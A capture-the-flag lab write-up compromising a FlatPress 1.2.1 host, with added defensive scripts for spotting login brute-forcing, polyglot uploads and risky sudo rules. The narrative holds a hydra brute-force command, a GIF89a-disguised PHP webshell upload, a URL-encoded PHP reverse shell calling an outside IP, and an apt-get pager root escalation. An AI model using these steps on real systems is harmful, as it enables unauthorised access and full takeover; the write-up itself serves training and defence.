CTF-200-08

Target IP: 192.168.250.29
Challenge Description: N/A.


Reconnaissance

[Screenshot: initial port scan results]
Performing a port scan shows there are three TCP ports open on the target machine, as shown above.

[Screenshot: aggressive scan of the three open TCP ports]
Performing an aggressive port scan against the three open TCP ports returns the result above. By the looks of it, there are two HTTP applications: one on port 80 and another on port 8089. I will start enumeration with the application on port 8089, since the application name and version, FlatPress fp-1.2.1, are provided.


Enumeration

Port 8089: HTTP
[Screenshot: FlatPress front page on port 8089]
Browsing to port 8089 displays the webpage above. There is one article, created by the FlatPress team; I was hoping for a user of this web application. I scanned the source code of this application and found that the application version is 1.2.1.

[Screenshot: FlatPress login page]
Browsing to /login displays the login page shown above. I tried different default credentials such as admin:admin and root:root, but I had no luck.

[Screenshot: search results for FlatPress 1.2.1 exploits]
Doing a Google search for flatpress 1.2.1 exploits returns the interesting GitHub page above. By the looks of it, this application is vulnerable to RCE, but I need the credentials of this application first. I performed a directory search against this application and did not find anything useful either.

[Screenshot: nmap --script=vuln output]
I performed another nmap scan with the flag --script=vuln and found a .gitignore directory. This contains the entries above.

[Screenshot: directory listing of /fp-content/]
Browsing to http://192.168.250.29:8089/fp-content/ shows the contents of this web application. However, I did not find anything important here either.

[Screenshot: hydra output]
Using hydra and the command hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.29 http-post-form "/login.php:user=admin&pass=^PASS^:Password incorrect." -s 8089, I managed to brute-force the password of the user admin. I obtained the credentials admin:password.
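From the defender's side, a run like the one above leaves a very recognisable trace in the web server's access log: a burst of POST requests to the login path from one source. The script below is an added example (not part of the writeup and not FlatPress code) that parses combined-format access-log lines and flags any source whose login POST rate crosses a threshold inside a sliding window. The log lines are constructed for the example; the assumption that the failure page is served with status 200 (so status codes cannot be used to separate failures from successes) is drawn from the fact that hydra had to match on the body text "Password incorrect." rather than on a status.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined-log style line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], TS_FMT),
        'method': m['method'],
        'path': m['path'].split('?', 1)[0],   # drop any query string
        'status': int(m['status']),
    }


def find_bruteforce(lines, login_path='/login.php',
                    window=timedelta(seconds=60), threshold=10):
    """Map each source IP to its peak number of login POSTs inside any `window`,
    keeping only sources at or above `threshold`.

    The count deliberately ignores the HTTP status: the failure page in this
    writeup was matched on the body text "Password incorrect.", so (assumed here)
    it is served with 200 just like a success, and only the rate gives it away.
    """
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'] == login_path:
            attempts[rec['ip']].append(rec['ts'])

    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def build_sample_log():
    """Constructed sample log (not captured from the target): one legitimate
    visitor with two login attempts, and one source firing 15 POSTs in 15 s."""
    base = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)

    def entry(ip, t, method, path, status):
        return (f'{ip} - - [{t.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
                f'{status} 1834 "-" "Mozilla/5.0"')

    lines = [
        entry('10.0.0.5', base, 'GET', '/fp-content/', 200),
        entry('10.0.0.5', base + timedelta(seconds=5), 'POST', '/login.php', 200),
        entry('10.0.0.5', base + timedelta(seconds=40), 'POST', '/login.php', 302),
    ]
    lines += [entry('10.0.0.9', base + timedelta(seconds=i), 'POST', '/login.php', 200)
              for i in range(15)]
    return lines


if __name__ == '__main__':
    for ip, n in find_bruteforce(build_sample_log()).items():
        print(f'ALERT {ip}: {n} login POSTs within 60 s')
```

Only the rate is used, so the same logic works whether the application answers a failed login with 200, 302 or 401; tune `window` and `threshold` to what a human user could plausibly type. The threshold of ten attempts per minute is a starting point, not a measured value.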


Exploitation

[Screenshot: FlatPress admin panel after logging in]
And bingo! I managed to gain access to the web application on port 8089 as the user admin, as shown above. From my previous enumeration, I found a PoC for the RCE. I will use this against the target web application.

[Screenshot: contents of shell.php]
I created the simple PHP webshell above with the name shell.php. It contains the magic-bytes header GIF89a; at the start to bypass the upload filters in place.
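The GIF89a trick works because the filter stops at the magic bytes. The validator below is an added example, not FlatPress code and not the filter the writeup bypassed: it accepts an upload only when the extension is an image type, the magic bytes agree with that extension, and no PHP open tag appears anywhere in the body, and it can also be run as a sweep over files already sitting in an upload directory. The sample files are constructed; the polyglot carries a harmless PHP comment as a marker rather than any shell code.

```python
import re

# Magic-byte prefixes for the image types an upload form commonly allows.
IMAGE_MAGIC = {
    b'GIF87a': 'gif',
    b'GIF89a': 'gif',
    b'\x89PNG\r\n\x1a\n': 'png',
    b'\xff\xd8\xff': 'jpeg',
}
ALLOWED_EXT = {'gif': 'gif', 'png': 'png', 'jpg': 'jpeg', 'jpeg': 'jpeg'}
# PHP open tags anywhere in the body; a real image never needs one.
PHP_TAG_RE = re.compile(rb'<\?(?:php\b|=)', re.IGNORECASE)


def detect_magic(data):
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def check_upload(filename, data):
    """Return (accepted, reason). Every rule must pass; the magic header
    alone is exactly the check the GIF89a prefix defeats."""
    ext = filename.rsplit('.', 1)[-1].lower() if '.' in filename else ''
    if ext not in ALLOWED_EXT:
        return False, f'extension .{ext} not allowed'
    kind = detect_magic(data)
    if kind is None:
        return False, 'no recognised image header'
    if kind != ALLOWED_EXT[ext]:
        return False, f'header says {kind} but extension says {ALLOWED_EXT[ext]}'
    if PHP_TAG_RE.search(data):
        return False, 'PHP open tag inside image data'
    return True, 'ok'


def triage_existing(files):
    """Post-incident sweep: given an upload directory as {name: bytes},
    return the names that fail the same rules, sorted."""
    return sorted(name for name, data in files.items()
                  if not check_upload(name, data)[0])


# Constructed samples (not the files from the writeup). 'photo.gif' is a
# minimal 1x1 GIF body; the two "shell" entries carry the GIF89a header
# followed by a PHP comment as a marker, not by any executable payload.
SAMPLES = {
    'photo.gif': (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff'
                  b',\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;'),
    'shell.php': b'GIF89a<?php /* constructed marker */ ?>',
    'shell.gif': b'GIF89a<?php /* constructed marker */ ?>',
    'notes.png': b'GIF89a',                      # wrong header for the extension
}


if __name__ == '__main__':
    for name, data in SAMPLES.items():
        print(name, check_upload(name, data))
    print('flagged:', triage_existing(SAMPLES))
```

Content checks are the second line of defence; the first is that nothing under the upload tree (fp-content/attachs on this target) is ever handed to the PHP engine, for example with php_admin_flag engine off in an Apache Directory block for that path, or an nginx location that returns 403 for anything matching \.php$ below it. With that in place a polyglot that slips past the validator is served as bytes, not executed.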

[Screenshot: Uploader page]
Then I pressed the Uploader button and uploaded my shell.php webshell, as shown above.

[Screenshot: Media Manager]
I browsed to Media Manager and clicked shell.php to open it.

[Screenshot: webshell command output]
And bingo! I can access my webshell at http://192.168.250.29:8089/fp-content/attachs/shell.php. I issued the commands ls;id;whoami, and the target machine executed them successfully, as shown above. Time to obtain a reverse shell connection now.

[Screenshot: reverse shell connection]
I started a listener on my machine on port 8443 to catch the reverse shell. Since the target machine is already using PHP, I used the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.237%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. I obtained a reverse shell connection on my machine on port 8443 with a session as www-data. Now I have a foothold on the target machine.


Privilege Escalation

[Screenshot: sudo -l output]
Running sudo -l shows the interesting entry above. The binary apt-get can be executed as the user root without a password.

[Screenshot: root shell]
Gaining a root shell is simple. I used the command sudo apt-get changelog apt first. This opens the changelog documentation. Then I entered the command !/bin/sh to spawn a root shell. Now I have a root shell on the target machine, as shown above.
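The rule that made this possible is easy to spot in an audit. The script below is an added example, not something from the writeup or the target: it parses the text that sudo -l prints and rates each rule, treating NOPASSWD on a command that drops into a pager as the worst case. apt-get is the page's own instance of such a command; apt is included on the assumption that its changelog subcommand behaves the same way. The sample output is constructed in the shape sudo -l uses and is not the target's real listing beyond the apt-get rule the writeup describes.

```python
import re

# One "sudo -l" rule line: "(runas) [TAG: ...] command[, command ...]".
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$'
)

# Commands that hand control to a pager or editor while running as root.
# apt-get is the writeup's case (its changelog subcommand opens a pager);
# apt is assumed here to behave the same way.
PAGER_SPAWNERS = {'apt-get', 'apt'}


def audit_sudo_l(output):
    """Parse the text of `sudo -l` and return one finding per command."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                      # Defaults lines, headers, blanks
        tags = {t.rstrip(':') for t in m['tags'].split()}
        nopasswd = 'NOPASSWD' in tags
        for cmd in m['cmds'].split(','):
            cmd = cmd.strip()
            if not cmd:
                continue
            base = cmd.split()[0].rsplit('/', 1)[-1]
            risky = cmd == 'ALL' or base in PAGER_SPAWNERS
            if risky and nopasswd:
                severity = 'high'         # root shell with no authentication at all
            elif risky or nopasswd:
                severity = 'medium'
            else:
                severity = 'info'
            findings.append({'runas': m['runas'].strip(), 'command': cmd,
                             'nopasswd': nopasswd, 'severity': severity})
    return findings


# Constructed sample in the shape sudo -l prints.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/systemctl restart apache2, /usr/bin/systemctl status apache2
"""


if __name__ == '__main__':
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        flag = 'NOPASSWD ' if f['nopasswd'] else ''
        print(f"{f['severity']:<6} ({f['runas']}) {flag}{f['command']}")
```

The fix on a machine like this one is to delete the rule; where a package tool genuinely has to run through sudo, the sudoers noexec option (for example Defaults!/usr/bin/apt-get noexec, on builds of sudo that support it) stops the pager it spawns from executing a shell.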


Flags

[Screenshot: proof.txt]
There is only one flag on the machine, proof.txt, as shown above.